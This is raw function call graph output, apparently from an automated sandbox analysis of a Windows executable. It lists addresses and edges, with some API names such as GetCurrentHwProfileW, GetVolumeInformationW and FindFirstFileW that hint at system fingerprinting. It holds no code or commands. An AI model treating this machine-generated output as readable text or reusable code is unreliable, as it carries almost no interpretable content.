67994 7ff75a6be400 67994->67966 67995 7ff75a6be200 82 API calls 67995->67996 67996->67994 67996->67995 67997 7ff75a6b8d10 82 API calls 67996->67997 67997->67996 68001 7ff75a71e893 67999->68001 68000 7ff75a71e8ac 68000->67979 68001->68000 68003 7ff75a71e8b2 68001->68003 68010 7ff75a719f1c 68001->68010 68006 7ff75a71e8bd 68003->68006 68013 7ff75a71f8dc RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 68003->68013 68014 7ff75a69b820 82 API calls 2 library calls 68006->68014 68007 7ff75a71e8c3 68009->67979 68015 7ff75a719f5c 68010->68015 68014->68007 68020 7ff75a70c3bc EnterCriticalSection 68015->68020 68022 7ff75a6b0cdd 68021->68022 68024 7ff75a6b0d51 68022->68024 68025 7ff75a6b0d73 68022->68025 68030 7ff75a6b0ced _Receive_impl 68022->68030 68023 7ff75a71e860 _Strcoll 8 API calls 68026 7ff75a6b0f1f 68023->68026 68062 7ff75a704648 68024->68062 68028 7ff75a704648 78 API calls 68025->68028 68026->67984 68035 7ff75a6b0da1 ctype 68028->68035 68029 7ff75a6b0ec1 68029->68030 68032 7ff75a6b0fa7 68029->68032 68030->68023 68031 7ff75a6b8d10 82 API calls 68031->68035 68033 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68032->68033 68034 7ff75a6b0fac 68033->68034 68036 7ff75a6b0fd4 68034->68036 68041 7ff75a6b0ca0 82 API calls 68034->68041 68035->68029 68035->68031 68037 7ff75a6b0f57 68035->68037 68040 7ff75a704648 78 API calls 68035->68040 68036->67984 68037->68029 68083 7ff75a707754 78 API calls 3 library calls 68037->68083 68039 7ff75a6b0feb 68039->67984 68040->68035 68041->68039 68044 7ff75a6c9ffa 68042->68044 68053 7ff75a6ca150 68042->68053 68045 7ff75a6ca016 68044->68045 68047 7ff75a6ca07a 68044->68047 68054 7ff75a6ca02a ctype 68044->68054 68046 7ff75a6ca156 68045->68046 68048 7ff75a71e888 std::_Facet_Register 82 API calls 68045->68048 68088 7ff75a69b820 82 API calls 2 library calls 68046->68088 68049 7ff75a71e888 std::_Facet_Register 82 API calls 68047->68049 68048->68054 68049->68054 68051 7ff75a6ca15c 68052 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68052->68053 68087 7ff75a6b0640 82 API calls 68053->68087 68054->68052 68055 7ff75a6ca113 _Receive_impl 68054->68055 68055->67985 68056->67990 68058 7ff75a720ea7 68057->68058 68059 7ff75a720ed0 RtlPcToFileHeader 68058->68059 68060 7ff75a720ef2 RaiseException 68058->68060 68061 7ff75a720ee8 68059->68061 68060->67992 68061->68060 68063 7ff75a704664 68062->68063 68064 7ff75a704682 68062->68064 68085 7ff75a704e68 11 API calls _get_daylight 68063->68085 68084 7ff75a704934 EnterCriticalSection 68064->68084 68068 7ff75a704669 68086 7ff75a708234 78 API calls _invalid_parameter_noinfo 68068->68086 68073 7ff75a704674 68073->68030 68083->68037 68085->68068 68086->68073 68088->68051 68089 7ff75a6efc10 68090 7ff75a6efc40 68089->68090 68095 7ff75a72b5b0 68090->68095 68093 7ff75a71e860 _Strcoll 8 API calls 68094 7ff75a6efc96 68093->68094 68099 7ff75a72b5f2 68095->68099 68096 7ff75a72b5fb 68097 7ff75a71e860 _Strcoll 8 API calls 68096->68097 68100 7ff75a6efc59 68097->68100 68098 7ff75a72b70d 68138 7ff75a72b984 CreateFileW GetLastError 68098->68138 68099->68096 68099->68098 68102 7ff75a72b653 GetFileAttributesExW 68099->68102 68100->68093 68104 7ff75a72b667 GetLastError 68102->68104 68105 7ff75a72b6b8 68102->68105 68103 7ff75a72b730 68106 7ff75a72b756 68103->68106 68107 7ff75a72b736 68103->68107 68104->68096 68108 7ff75a72b676 FindFirstFileW 68104->68108 68105->68096 68105->68098 68111 7ff75a72b765 GetFileInformationByHandleEx 68106->68111 68112 7ff75a72b803 68106->68112 68109 7ff75a72b741 CloseHandle 68107->68109 68110 7ff75a72b74f 68107->68110 68113 7ff75a72b68a GetLastError 68108->68113 68114 7ff75a72b695 FindClose 68108->68114 68109->68110 68115 7ff75a72b8c5 68109->68115 68110->68096 68118 7ff75a72b77f GetLastError 68111->68118 68119 7ff75a72b7a5 68111->68119 68116 7ff75a72b81e GetFileInformationByHandleEx 68112->68116 68117 7ff75a72b858 68112->68117 68113->68096 68114->68105 68139 7ff75a7098b4 78 API calls __std_fs_directory_iterator_open 68115->68139 68116->68117 68121 7ff75a72b834 GetLastError 68116->68121 68123 7ff75a72b8ab 68117->68123 68124 7ff75a72b86f 68117->68124 68118->68110 68122 7ff75a72b78d CloseHandle 68118->68122 68119->68112 68128 7ff75a72b7c6 GetFileInformationByHandleEx 68119->68128 68121->68110 68126 7ff75a72b846 CloseHandle 68121->68126 68122->68110 68137 7ff75a72b8d6 68122->68137 68123->68110 68125 7ff75a72b8b1 CloseHandle 68123->68125 68124->68096 68127 7ff75a72b875 CloseHandle 68124->68127 68125->68110 68125->68115 68126->68110 68132 7ff75a72b8d0 68126->68132 68127->68096 68127->68115 68128->68112 68130 7ff75a72b7e2 GetLastError 68128->68130 68130->68110 68134 7ff75a72b7f0 CloseHandle 68130->68134 68131 7ff75a72b8ca 68140 7ff75a7098b4 78 API calls __std_fs_directory_iterator_open 68131->68140 68141 7ff75a7098b4 78 API calls __std_fs_directory_iterator_open 68132->68141 68134->68110 68134->68131 68142 7ff75a7098b4 78 API calls __std_fs_directory_iterator_open 68137->68142 68138->68103 68143 7ff75a6f6290 68162 7ff75a6ef9e0 68143->68162 68147 7ff75a6f6333 68149 7ff75a6f6457 68147->68149 68150 7ff75a6f6365 __scrt_get_show_window_mode _Receive_impl 68147->68150 68148 7ff75a6f6381 68151 7ff75a71e860 _Strcoll 8 API calls 68148->68151 68152 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68149->68152 68150->68148 68175 7ff75a6e86d0 122 API calls 68150->68175 68154 7ff75a6f643e 68151->68154 68155 7ff75a6f645c 68152->68155 68156 7ff75a6f63bd 68176 7ff75a6e8830 121 API calls 2 library calls 68156->68176 68158 7ff75a6f63e4 68177 7ff75a6afe50 68158->68177 68184 7ff75a6edec0 68162->68184 68164 7ff75a6efb47 68206 7ff75a6edcd0 82 API calls Concurrency::cancel_current_task 68164->68206 68166 7ff75a6efa2d 68166->68164 68191 7ff75a6a6940 68166->68191 68169 7ff75a6efa9e 68170 7ff75a6efb07 _Receive_impl 68169->68170 68172 7ff75a6efb42 68169->68172 68171 7ff75a71e860 _Strcoll 8 API calls 68170->68171 68173 7ff75a6efb2c GetVolumeInformationW 68171->68173 68174 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68172->68174 68173->68147 68173->68150 68174->68164 68175->68156 68176->68158 68178 7ff75a6afe98 68177->68178 68179 7ff75a6afefc 68178->68179 68215 7ff75a6b4600 82 API calls 5 library calls 68178->68215 68181 7ff75a6aebc0 68179->68181 68216 7ff75a6b20b0 68181->68216 68183 7ff75a6aec0d 68183->68148 68185 7ff75a6edf3f 68184->68185 68188 7ff75a6edf20 68184->68188 68185->68188 68211 7ff75a6b8b50 82 API calls 5 library calls 68185->68211 68190 7ff75a6ee055 68188->68190 68207 7ff75a72b574 GetCurrentDirectoryW 68188->68207 68212 7ff75a6b8b50 82 API calls 5 library calls 68188->68212 68190->68166 68192 7ff75a6a6a64 68191->68192 68196 7ff75a6a6966 68191->68196 68214 7ff75a69b8e0 82 API calls 68192->68214 68194 7ff75a6a69df 68200 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68194->68200 68205 7ff75a6a6971 ctype 68194->68205 68195 7ff75a6a6a5f 68213 7ff75a69b820 82 API calls 2 library calls 68195->68213 68196->68195 68198 7ff75a6a6a22 68196->68198 68199 7ff75a6a69ca 68196->68199 68196->68205 68202 7ff75a71e888 std::_Facet_Register 82 API calls 68198->68202 68199->68195 68203 7ff75a6a69d7 68199->68203 68201 7ff75a6a6a70 68200->68201 68202->68205 68204 7ff75a71e888 std::_Facet_Register 82 API calls 68203->68204 68204->68194 68205->68169 68208 7ff75a72b595 GetLastError 68207->68208 68209 7ff75a72b586 68207->68209 68210 7ff75a72b58a 68208->68210 68209->68208 68209->68210 68210->68188 68211->68188 68212->68188 68213->68192 68215->68179 68217 7ff75a6b20ce 68216->68217 68218 7ff75a6b2120 _Receive_impl 68216->68218 68217->68218 68219 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68217->68219 68218->68183 68220 7ff75a6b21ac 68219->68220 68221 7ff75a6f6c70 GetCurrentHwProfileW 68222 7ff75a6f6d19 68221->68222 68223 7ff75a6f6cba 68221->68223 68226 7ff75a71e860 _Strcoll 8 API calls 68222->68226 68229 7ff75a6e78f0 68223->68229 68225 7ff75a6f6cc9 68225->68222 68241 7ff75a6ffb34 85 API calls 68225->68241 68228 7ff75a6f6d91 68226->68228 68230 7ff75a6e793e 68229->68230 68237 7ff75a6e791f _Receive_impl 68229->68237 68233 7ff75a6a6940 82 API calls 68230->68233 68231 7ff75a71e860 _Strcoll 8 API calls 68232 7ff75a6e79de 68231->68232 68232->68225 68234 7ff75a6e7967 68233->68234 68242 7ff75a6e7a00 10 API calls _Strcoll 68234->68242 68236 7ff75a6e7975 68236->68237 68238 7ff75a6e79ec 68236->68238 68237->68231 68239 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68238->68239 68240 7ff75a6e79f1 68239->68240 68241->68225 68242->68236 68243 7ff75a6fc5cb 68244 7ff75a6fc5f1 68243->68244 68248 7ff75a6fc5dc 68243->68248 68245 7ff75a6fc7bf 68244->68245 68246 7ff75a6fc5fa 68244->68246 68247 7ff75a6fc86f 68245->68247 68253 7ff75a6fd050 84 API calls 68245->68253 68259 7ff75a6fc570 8 API calls 68245->68259 68263 7ff75a6fc652 68246->68263 68288 7ff75a6b27e0 68246->68288 68252 7ff75a6fd050 84 API calls 68247->68252 68249 7ff75a71e860 _Strcoll 8 API calls 68248->68249 68251 7ff75a6fceb3 68249->68251 68254 7ff75a6fc888 68252->68254 68253->68245 68258 7ff75a6fc570 8 API calls 68254->68258 68255 7ff75a6fc722 68257 7ff75a6fd050 84 API calls 68255->68257 68260 7ff75a6fc75b 68257->68260 68258->68248 68259->68245 68262 7ff75a6fc570 8 API calls 68260->68262 68262->68248 68263->68255 68264 7ff75a6fd050 68263->68264 68284 7ff75a6fc570 68263->68284 68269 7ff75a6fd08f 68264->68269 68271 7ff75a6fd292 68264->68271 68265 7ff75a6fd308 68300 7ff75a69b900 8 API calls _Strcoll 68265->68300 68268 7ff75a6fd329 68301 7ff75a6fe760 82 API calls 68268->68301 68269->68265 68275 7ff75a6fd28d 68269->68275 68294 7ff75a6b3d70 68269->68294 68299 7ff75a69b5b0 80 API calls 68269->68299 68271->68263 68272 7ff75a6fd33f 68302 7ff75a6b7ac0 68272->68302 68275->68271 68322 7ff75a6fe840 82 API calls 68275->68322 68276 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68276->68275 68278 7ff75a6fd38a 68279 7ff75a6b7ac0 82 API calls 68278->68279 68280 7ff75a6fd39d 68279->68280 68281 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68280->68281 68282 7ff75a6fd3ae 68281->68282 68285 7ff75a6fc5a0 68284->68285 68286 7ff75a71e860 _Strcoll 8 API calls 68285->68286 68287 7ff75a6fceb3 68286->68287 68287->68263 68289 7ff75a6b27ed 68288->68289 68290 7ff75a6b2804 68288->68290 68289->68263 68293 7ff75a6b281e __scrt_get_show_window_mode 68290->68293 68416 7ff75a6b8e80 68290->68416 68292 7ff75a6b286c 68292->68263 68293->68263 68295 7ff75a6b3dd2 68294->68295 68298 7ff75a6b3d93 ctype 68294->68298 68323 7ff75a6b9030 68295->68323 68297 7ff75a6b3deb 68297->68269 68298->68269 68299->68269 68300->68268 68301->68272 68303 7ff75a6b7b17 68302->68303 68340 7ff75a69ebf0 68303->68340 68305 7ff75a6b7b55 68364 7ff75a6c0400 68305->68364 68307 7ff75a6b7b69 _Receive_impl 68310 7ff75a6b7d2f 68307->68310 68311 7ff75a6b7d35 68307->68311 68321 7ff75a6b7d29 68307->68321 68374 7ff75a720740 68307->68374 68308 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68308->68310 68312 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68310->68312 68315 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68311->68315 68312->68311 68314 7ff75a6b7cf1 _Receive_impl 68317 7ff75a71e860 _Strcoll 8 API calls 68314->68317 68316 7ff75a6b7d3b 68315->68316 68319 7ff75a6b7d16 68317->68319 68318 7ff75a6b7d24 68320 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68318->68320 68319->68276 68320->68321 68321->68308 68322->68278 68324 7ff75a6b91a6 68323->68324 68328 7ff75a6b9068 68323->68328 68338 7ff75a69b8e0 82 API calls 68324->68338 68326 7ff75a6b90cd 68329 7ff75a71e888 std::_Facet_Register 82 API calls 68326->68329 68327 7ff75a6b91ab 68339 7ff75a69b820 82 API calls 2 library calls 68327->68339 68328->68326 68331 7ff75a6b90c0 68328->68331 68332 7ff75a6b90fc 68328->68332 68335 7ff75a6b90b3 ctype 68328->68335 68329->68335 68331->68326 68331->68327 68333 7ff75a71e888 std::_Facet_Register 82 API calls 68332->68333 68333->68335 68334 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68336 7ff75a6b91b7 68334->68336 68335->68334 68337 7ff75a6b915c ctype _Receive_impl 68335->68337 68337->68297 68339->68335 68342 7ff75a69ec2b 68340->68342 68341 7ff75a69ed21 68344 7ff75a6b3d70 82 API calls 68341->68344 68342->68341 68380 7ff75a6b8560 68342->68380 68345 7ff75a69ed3a 68344->68345 68346 7ff75a6b3d70 82 API calls 68345->68346 68347 7ff75a69ed53 68346->68347 68348 7ff75a69ed60 68347->68348 68349 7ff75a6b8d10 82 API calls 68347->68349 68350 7ff75a6b3d70 82 API calls 68348->68350 68349->68348 68351 7ff75a69edaa 68350->68351 68352 7ff75a6b3d70 82 API calls 68351->68352 68353 7ff75a69edbf 68352->68353 68354 7ff75a69ee03 _Receive_impl 68353->68354 68356 7ff75a69ee3c 68353->68356 68355 7ff75a71e860 _Strcoll 8 API calls 68354->68355 68357 7ff75a69ee28 68355->68357 68358 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68356->68358 68357->68305 68359 7ff75a69ee41 68358->68359 68406 7ff75a7207d0 68359->68406 68362 7ff75a7207d0 __std_exception_destroy 13 API calls 68363 7ff75a69ee92 _Receive_impl 68362->68363 68363->68305 68365 7ff75a6c0464 68364->68365 68366 7ff75a6c0458 68364->68366 68368 7ff75a6b3d70 82 API calls 68365->68368 68367 7ff75a6b8560 82 API calls 68366->68367 68367->68365 68369 7ff75a6c0481 68368->68369 68370 7ff75a6b3d70 82 API calls 68369->68370 68371 7ff75a6c049a 68370->68371 68372 7ff75a6b3d70 82 API calls 68371->68372 68373 7ff75a6c04b3 68372->68373 68373->68307 68375 7ff75a720761 68374->68375 68379 7ff75a6b7ca4 68374->68379 68376 7ff75a720796 68375->68376 68375->68379 68414 7ff75a708cb0 78 API calls 2 library calls 68375->68414 68415 7ff75a707620 13 API calls 2 library calls 68376->68415 68379->68314 68379->68318 68381 7ff75a6b869a 68380->68381 68385 7ff75a6b8589 68380->68385 68410 7ff75a69b8e0 82 API calls 68381->68410 68383 7ff75a6b85ee 68386 7ff75a71e888 std::_Facet_Register 82 API calls 68383->68386 68384 7ff75a6b869f 68411 7ff75a69b820 82 API calls 2 library calls 68384->68411 68385->68383 68387 7ff75a6b85e1 68385->68387 68388 7ff75a6b861d 68385->68388 68392 7ff75a6b85d4 ctype 68385->68392 68386->68392 68387->68383 68387->68384 68390 7ff75a71e888 std::_Facet_Register 82 API calls 68388->68390 68390->68392 68391 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68394 7ff75a6b86ab 68391->68394 68392->68391 68393 7ff75a6b8667 ctype _Receive_impl 68392->68393 68393->68341 68396 7ff75a6b8765 68394->68396 68397 7ff75a6b875a 68394->68397 68399 7ff75a6b870c 68394->68399 68402 7ff75a6b86dc ctype 68394->68402 68395 7ff75a71e888 std::_Facet_Register 82 API calls 68401 7ff75a6b8722 68395->68401 68400 7ff75a71e888 std::_Facet_Register 82 API calls 68396->68400 68398 7ff75a6b879f 68397->68398 68397->68399 68412 7ff75a69b820 82 API calls 2 library calls 68398->68412 68399->68395 68400->68402 68401->68402 68404 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68401->68404 68402->68341 68405 7ff75a6b87aa 68404->68405 68405->68341 68407 7ff75a69ee85 68406->68407 68408 7ff75a7207df 68406->68408 68407->68362 68413 7ff75a707620 13 API calls 2 library calls 68408->68413 68411->68392 68412->68401 68413->68407 68414->68376 68415->68379 68417 7ff75a6b900f 68416->68417 68421 7ff75a6b8eaf 68416->68421 68431 7ff75a69b8e0 82 API calls 68417->68431 68419 7ff75a6b8f19 68422 7ff75a71e888 std::_Facet_Register 82 API calls 68419->68422 68420 7ff75a6b9014 68432 7ff75a69b820 82 API calls 2 library calls 68420->68432 68421->68419 68424 7ff75a6b8f48 68421->68424 68425 7ff75a6b8f0c 68421->68425 68428 7ff75a6b8eff ctype __scrt_get_show_window_mode 68421->68428 68422->68428 68426 7ff75a71e888 std::_Facet_Register 82 API calls 68424->68426 68425->68419 68425->68420 68426->68428 68427 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68429 7ff75a6b9020 68427->68429 68428->68427 68430 7ff75a6b8fbe ctype __scrt_get_show_window_mode _Receive_impl 68428->68430 68430->68292 68432->68428 68433 7ff75a6fc8c9 68434 7ff75a6fc8f4 68433->68434 68447 7ff75a6fc8df 68433->68447 68438 7ff75a6fc8fd 68434->68438 68443 7ff75a6fcac0 68434->68443 68435 7ff75a6fcb29 68437 7ff75a6fc570 8 API calls 68435->68437 68436 7ff75a71e860 _Strcoll 8 API calls 68440 7ff75a6fceb3 68436->68440 68437->68447 68439 7ff75a6fc95a __scrt_get_show_window_mode 68438->68439 68442 7ff75a6b8e80 82 API calls 68438->68442 68444 7ff75a6fca4a 68439->68444 68446 7ff75a6fc570 8 API calls 68439->68446 68441 7ff75a6fc570 8 API calls 68441->68443 68442->68439 68443->68435 68443->68441 68445 7ff75a6fc570 8 API calls 68444->68445 68445->68447 68446->68439 68447->68436 68448 7ff75a6c214b 68577 7ff75a6ca770 68448->68577 68450 7ff75a6c265d 68789 7ff75a6bc4d0 68450->68789 68452 7ff75a6c2b14 68453 7ff75a71e860 _Strcoll 8 API calls 68452->68453 68454 7ff75a6c2b26 68453->68454 68455 7ff75a6bc600 82 API calls 68467 7ff75a6c1fae 68455->68467 68456 7ff75a6c2388 68595 7ff75a6bc600 68456->68595 68458 7ff75a6c23d4 68626 7ff75a6bb780 68458->68626 68459 7ff75a6c2662 68464 7ff75a6bb780 84 API calls 68459->68464 68460 7ff75a6c2390 68461 7ff75a6c27cc 68460->68461 68462 7ff75a6c239c 68460->68462 68472 7ff75a6bb780 84 API calls 68461->68472 68613 7ff75a6c4580 68462->68613 68468 7ff75a6c26a2 68464->68468 68466 7ff75a6c25ed 68682 7ff75a6c1af0 68466->68682 68467->68450 68467->68455 68467->68456 68467->68458 68467->68459 68474 7ff75a6c49c0 82 API calls 68467->68474 68559 7ff75a6ca490 68467->68559 68625 7ff75a6cac10 82 API calls 68467->68625 68471 7ff75a6c1af0 84 API calls 68468->68471 68469 7ff75a6c23b4 68473 7ff75a6bc600 82 API calls 68469->68473 68476 7ff75a6c26c8 68471->68476 68477 7ff75a6c280c 68472->68477 68478 7ff75a6c23c0 68473->68478 68474->68467 68475 7ff75a6c2613 68771 7ff75a6bbd00 68475->68771 68480 7ff75a6bbd00 84 API calls 68476->68480 68481 7ff75a6c1af0 84 API calls 68477->68481 68482 7ff75a6c2717 68478->68482 68483 7ff75a6c23cc 68478->68483 68487 7ff75a6c26d8 68480->68487 68488 7ff75a6c2832 68481->68488 68495 7ff75a6bb780 84 API calls 68482->68495 68489 7ff75a6bc600 82 API calls 68483->68489 68492 7ff75a6c26e7 68487->68492 68493 7ff75a6c2bcd 68487->68493 68494 7ff75a6bbd00 84 API calls 68488->68494 68489->68458 68490 7ff75a6c2632 68779 7ff75a6b2880 68490->68779 68491 7ff75a6c2bb1 68794 7ff75a6b3e90 80 API calls 68491->68794 68498 7ff75a6b2880 78 API calls 68492->68498 68795 7ff75a6b3e90 80 API calls 68493->68795 68499 7ff75a6c2842 68494->68499 68502 7ff75a6c2757 68495->68502 68505 7ff75a6c26f3 68498->68505 68506 7ff75a6c2851 68499->68506 68507 7ff75a6c2c07 68499->68507 68501 7ff75a6c2bda 68508 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68501->68508 68509 7ff75a6c1af0 84 API calls 68502->68509 68503 7ff75a6c263e 68784 7ff75a69eec0 68503->68784 68504 7ff75a6c2bbd 68512 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68504->68512 68513 7ff75a69eec0 13 API calls 68505->68513 68514 7ff75a6b2880 78 API calls 68506->68514 68797 7ff75a6b3e90 80 API calls 68507->68797 68515 7ff75a6c2bea 68508->68515 68516 7ff75a6c277d 68509->68516 68512->68493 68519 7ff75a6c26fd 68513->68519 68520 7ff75a6c285d 68514->68520 68796 7ff75a6b3e90 80 API calls 68515->68796 68522 7ff75a6bbd00 84 API calls 68516->68522 68517 7ff75a6c2c14 68523 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68517->68523 68525 7ff75a6b2880 78 API calls 68519->68525 68521 7ff75a69eec0 13 API calls 68520->68521 68526 7ff75a6c2867 68521->68526 68528 7ff75a6c278d 68522->68528 68529 7ff75a6c2c24 68523->68529 68524 7ff75a6b2880 78 API calls 68530 7ff75a6c2652 68524->68530 68531 7ff75a6c2707 68525->68531 68533 7ff75a6b2880 78 API calls 68526->68533 68528->68515 68535 7ff75a6c279c 68528->68535 68798 7ff75a6b3e90 80 API calls 68529->68798 68537 7ff75a6b2880 78 API calls 68530->68537 68532 7ff75a6b2880 78 API calls 68531->68532 68532->68450 68538 7ff75a6c2871 68533->68538 68534 7ff75a6c2bf7 68539 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68534->68539 68540 7ff75a6b2880 78 API calls 68535->68540 68537->68450 68542 7ff75a6b2880 78 API calls 68538->68542 68539->68507 68543 7ff75a6c27a8 68540->68543 68541 7ff75a6c2c31 68544 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68541->68544 68542->68450 68546 7ff75a69eec0 13 API calls 68543->68546 68545 7ff75a6c2c41 68544->68545 68799 7ff75a6b3e90 80 API calls 68545->68799 68548 7ff75a6c27b2 68546->68548 68549 7ff75a6b2880 78 API calls 68548->68549 68551 7ff75a6c27bc 68549->68551 68550 7ff75a6c2c4e 68552 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68550->68552 68553 7ff75a6b2880 78 API calls 68551->68553 68554 7ff75a6c2c5e 68552->68554 68553->68450 68800 7ff75a6b3e90 80 API calls 68554->68800 68556 7ff75a6c2c6b 68557 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68556->68557 68558 7ff75a6c2c7b 68557->68558 68560 7ff75a6ca515 68559->68560 68561 7ff75a6ca4af 68559->68561 68563 7ff75a6ca581 68560->68563 68564 7ff75a6ca51e 68560->68564 68562 7ff75a6cd590 82 API calls 68561->68562 68566 7ff75a6ca4cd 68562->68566 68801 7ff75a6cd590 68563->68801 68567 7ff75a6ca54f 68564->68567 68568 7ff75a6ca52c 68564->68568 68810 7ff75a6b3ff0 68566->68810 68842 7ff75a6d1d30 82 API calls 3 library calls 68567->68842 68571 7ff75a6cd590 82 API calls 68568->68571 68575 7ff75a6ca547 68571->68575 68573 7ff75a6b3ff0 82 API calls 68576 7ff75a6ca5d5 68573->68576 68575->68467 68576->68467 68578 7ff75a6ca805 68577->68578 68579 7ff75a6ca790 68577->68579 68581 7ff75a6ca80f 68578->68581 68582 7ff75a6ca877 68578->68582 68580 7ff75a6b3ff0 82 API calls 68579->68580 68584 7ff75a6ca7b5 68580->68584 68585 7ff75a6ca844 68581->68585 68586 7ff75a6ca81d 68581->68586 68583 7ff75a6b3ff0 82 API calls 68582->68583 68588 7ff75a6ca89c 68583->68588 68589 7ff75a6b3ff0 82 API calls 68584->68589 68869 7ff75a6d2090 82 API calls 3 library calls 68585->68869 68590 7ff75a6b3ff0 82 API calls 68586->68590 68592 7ff75a6b3ff0 82 API calls 68588->68592 68593 7ff75a6ca7f1 68589->68593 68591 7ff75a6ca836 68590->68591 68591->68467 68594 7ff75a6ca8d9 68592->68594 68593->68467 68594->68467 68596 7ff75a6bc623 68595->68596 68600 7ff75a6bc670 68595->68600 68597 7ff75a6be200 82 API calls 68596->68597 68599 7ff75a6bc628 68597->68599 68598 7ff75a6be200 82 API calls 68598->68600 68599->68600 68601 7ff75a6be200 82 API calls 68599->68601 68600->68598 68611 7ff75a6bc6c3 68600->68611 68602 7ff75a6bc637 68601->68602 68603 7ff75a6bc64d 68602->68603 68604 7ff75a6be200 82 API calls 68602->68604 68605 7ff75a71e860 _Strcoll 8 API calls 68603->68605 68608 7ff75a6bc646 68604->68608 68606 7ff75a6bc66a 68605->68606 68606->68460 68607 7ff75a6bc7c8 68609 7ff75a71e860 _Strcoll 8 API calls 68607->68609 68608->68600 68608->68603 68610 7ff75a6bc91b 68609->68610 68610->68460 68611->68607 68612 7ff75a6be200 82 API calls 68611->68612 68612->68611 68614 7ff75a6c45a5 68613->68614 68615 7ff75a6c4681 68614->68615 68616 7ff75a6c45d8 68614->68616 68624 7ff75a6c4630 68614->68624 68880 7ff75a69b9e0 82 API calls 68615->68880 68618 7ff75a71e888 std::_Facet_Register 82 API calls 68616->68618 68620 7ff75a6c45fc 68618->68620 68621 7ff75a6b29b0 82 API calls 68620->68621 68622 7ff75a6c4618 68621->68622 68870 7ff75a6b37f0 68622->68870 68624->68469 68625->68467 68628 7ff75a6bb7ce 68626->68628 68627 7ff75a6bb81e 68631 7ff75a6b3d70 82 API calls 68627->68631 68628->68627 68630 7ff75a6b8560 82 API calls 68628->68630 68647 7ff75a6bb8ac _Receive_impl 68628->68647 68629 7ff75a6b3d70 82 API calls 68632 7ff75a6bb912 68629->68632 68630->68627 68634 7ff75a6bb838 68631->68634 68633 7ff75a6bb91e 68632->68633 68638 7ff75a6bbad1 68632->68638 68635 7ff75a6bbd00 84 API calls 68633->68635 68636 7ff75a6b3d70 82 API calls 68634->68636 68641 7ff75a6bb92b 68635->68641 68637 7ff75a6bb852 68636->68637 68639 7ff75a6bb85f 68637->68639 68640 7ff75a6b8d10 82 API calls 68637->68640 68638->68638 68645 7ff75a6b8560 82 API calls 68638->68645 68648 7ff75a6bbb2d 68638->68648 68642 7ff75a6b3d70 82 API calls 68639->68642 68640->68639 68643 7ff75a6b8560 82 API calls 68641->68643 68644 7ff75a6bb987 68641->68644 68642->68647 68643->68644 68644->68644 68650 7ff75a6b3d70 82 API calls 68644->68650 68645->68648 68646 7ff75a6b3d70 82 API calls 68649 7ff75a6bbb47 68646->68649 68647->68629 68653 7ff75a6bbcdf 68647->68653 68648->68646 68652 7ff75a6b3d70 82 API calls 68649->68652 68651 7ff75a6bb9a6 68650->68651 68654 7ff75a6b3d70 82 API calls 68651->68654 68655 7ff75a6bbb66 68652->68655 68656 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68653->68656 68657 7ff75a6bb9bc 68654->68657 68658 7ff75a6b3d70 82 API calls 68655->68658 68659 7ff75a6bbce5 68656->68659 68660 7ff75a6b3d70 82 API calls 68657->68660 68671 7ff75a6bba30 _Receive_impl 68658->68671 68662 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68659->68662 68661 7ff75a6bb9d6 68660->68661 68663 7ff75a6bb9e3 68661->68663 68665 7ff75a6b8d10 82 API calls 68661->68665 68664 7ff75a6bbceb 68662->68664 68667 7ff75a6b3d70 82 API calls 68663->68667 68668 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68664->68668 68665->68663 68666 7ff75a6bbcf1 68669 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68666->68669 68667->68671 68668->68666 68670 7ff75a6bbcf7 68669->68670 68671->68659 68671->68664 68671->68666 68671->68671 68672 7ff75a6bbc2d 68671->68672 68673 7ff75a6b8560 82 API calls 68671->68673 68679 7ff75a6bbcb1 _Receive_impl 68671->68679 68674 7ff75a6b3d70 82 API calls 68672->68674 68673->68672 68675 7ff75a6bbc47 68674->68675 68675->68675 68676 7ff75a6b3d70 82 API calls 68675->68676 68677 7ff75a6bbc5f 68676->68677 68678 7ff75a6b3d70 82 API calls 68677->68678 68680 7ff75a6bbc79 68678->68680 68679->68466 68680->68679 68681 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68680->68681 68681->68653 68683 7ff75a6c1b4f 68682->68683 68882 7ff75a69ef10 82 API calls 3 library calls 68683->68882 68685 7ff75a6c1b66 68686 7ff75a69ebf0 82 API calls 68685->68686 68687 7ff75a6c1ba2 68686->68687 68883 7ff75a6c04d0 82 API calls 68687->68883 68689 7ff75a6c1de8 68690 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68689->68690 68691 7ff75a6c1dee 68690->68691 68694 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68691->68694 68692 7ff75a6c1bc1 _Receive_impl 68692->68689 68692->68691 68693 7ff75a720740 __std_exception_copy 80 API calls 68692->68693 68695 7ff75a6c1df4 68692->68695 68696 7ff75a6c1dfa 68692->68696 68697 7ff75a6c1d53 68693->68697 